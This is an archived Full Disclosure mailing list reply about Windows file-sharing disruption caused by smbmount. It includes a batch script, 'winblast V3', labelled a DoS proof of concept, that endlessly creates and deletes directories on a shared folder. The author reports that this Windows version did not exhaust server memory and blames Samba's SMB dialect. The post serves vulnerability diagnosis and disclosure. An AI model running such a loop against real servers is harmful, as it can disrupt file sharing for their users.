Full Disclosure mailing list archives

Re: smbmount disrupts Windows file sharing.

From: "Daniel Kabs [ML]" <dkabs () mobotix com>
Date: Tue, 03 Feb 2004 11:45:25 +0100

On Mon, 2 Feb 2004 11:56, <Glenn_Everhart () bankone com> wrote:
If you run a script on the windows box locally to create and
delete all these directories then, does the paged pool also
get used up? (I should imagine that if nothing else
springs to mind, using cygwin to give you a familiar
scripting language would be workable.) I don't have
a W2003 box to try this on, but wonder
about the local case, and the case of another windows client
doing the same thing. Do you suppose some lock on the
directory is being taken out and not removed (and not
recognized when the directory is recreated)?

Glenn Everhart

Indeed, I did transmogrify the shell script to run in Windows
as a batch file (.bat):

------------cut here-----------------------
@echo off
REM winblast V3 - DoS on WinXP, Win2003Srv
REM 2003-12-04 Steve Ladjabi, Daniel Kabs

cd K:\sharedfolder
if ERRORLEVEL 1 goto exit0

set count=0

REM using 'pathcount' directories
set pathcount=1000

echo running 'winblast v3' with %pathcount% files in loop ...
:START
  set /a p=pathcount*2-1
  set /a stop=pathcount-1
  :LOOP
    set dirname="wbst%p%"
    REM delete old directory if it exists
    if exist %dirname% rmdir %dirname%
    REM generating directory and exit on any error
    mkdir %dirname%
    if ERRORLEVEL 1 goto exit1
    set /a p=p-1
    set /a count=count+1
    if not "%p%" == "%stop%" goto LOOP
  echo %count% directories generated ...
goto START

:exit0
echo Abort. Could not open target directory.
goto ende

:exit1
echo Abort. Could not create directory: %dirname%

:ende

Running this script on a Windows box that had a shared folder
mounted (e.g. W2k Prof.) did not adversely affect memory
consumption on the server.

Thus I think this problem is related to the SMB protocol
dialect "spoken" by the Samba software (smbclient).

Daniel Kabs

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html